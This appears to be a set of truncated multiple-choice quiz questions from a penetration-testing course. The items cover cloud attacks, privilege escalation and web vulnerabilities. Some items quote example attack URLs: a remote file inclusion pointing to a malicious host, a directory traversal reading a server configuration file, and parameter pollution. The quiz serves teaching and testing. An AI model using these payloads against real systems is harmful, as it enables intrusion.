Which cloud technology attack method would require the threat actor to create a malicious application and install it into a SaaS, PaaS, or IaaS environment? resource exhaustion attack account takeover…
Which cloud technology attack method could generate crafted packets to cause a cloud application to crash? resource exhaustion attack account takeover metadata service attack side-channel attack Explanation & Hint: Threat…
Which tool could be used to find vulnerabilities that could lead to metadata service attacks? Nimbostratus Clair Falco Dagda Explanation & Hint: Tools such as nimbostratus (https://github.com/andresriancho/nimbostratus) can be used…
Which cloud technology attack method could a threat actor use to access a user or application account that allows access to more accounts and information? account takeover metadata service attacks…
Which term describes when a lower-privileged user accesses functions reserved for higher-privileged users? vertical privilege escalation horizontal privilege escalation credential harvesting metadata service attacks Explanation & Hint: Vertical privilege escalation…
Which cloud technology attack method could exploit a bug in a software application to gain access to resources that normally would not be accessible to a user? account takeover credential…
Which cloud technology attack method involves breaching the infrastructure to gather and steal information such as valid usernames, passwords, tokens, and PINs? account takeover credential harvesting privilege escalation side-channel attacks…
Which term is an essential characteristic of cloud computing as defined in NIST SP 800-145? centralized storage resource pooling reduced bandwidth requirements slow elasticity Explanation & Hint: NIST SP 800-145…
What is the best practice to mitigate the vulnerabilities from a lack of proper error handling in an application? Use only a minimum set of error messages. Use a strong…
Because of an insecure code practice, an attacker can leverage and completely compromise an application or the underlying system. What insecure code practice enabled this catastrophic threat? lack of error…
An attacker enters the following URL to exploit vulnerabilities in a web application: http://192.168.47.8:76/files/fi/?page=http://malicious.h4cker.org/cookie.html Which type of vulnerability did the attacker try to exploit? directory traversal cookie manipulation local file…
After some reconnaissance efforts, an attacker identified a web server hosted on a Linux system. The attacker then entered the URL shown below, http://192.168.46.82:45/vulnerabilities/fi/?page=../../../../../etc/httpd/httpd.conf Which type of web vulnerability is…
According to OWASP, which three statements are rules to prevent XSS attacks? (Choose three.) Use the HTML <a> tag with JavaScript encoding. Use HTTPS only mode for accessing web applications. …
An attacker sends a request to an online university portal site with the information: https://portal.a-univ.edu/?search=students&results=50&search=staff Which type of vulnerability does the attacker try to exploit? redirect session hijacking default credential …
An organization has developed a network security policy stating that newly purchased routers and switches must be configured with advanced security measures before deploying them to the production network. Which…
A web application configures client cookies with the HTTPOnly flag. What is the effect of this flag? It informs the web client that the cookie is a persistent cookie. It…
What is a potentially dangerous web session management practice? including the session ID in the URL setting a cookie with the Expires attribute setting a cookie with the Max-Age attribute …
A company uses the Microsoft Active Directory service to manage the authentication and authorization of employee workstations. The company hires a cybersecurity professional to perform compliance penetration testing. Which type…
Which type of SQL query is in the SQL statement select * from users where user = "admin";? static query stacked query out-of-band query parameterized query Explanation & Hint: The…
An attacker launches an SQL injection attack on a web application by trying to force the application requesting the back-end database to perform multiple SELECT queries. Which technique exploits the…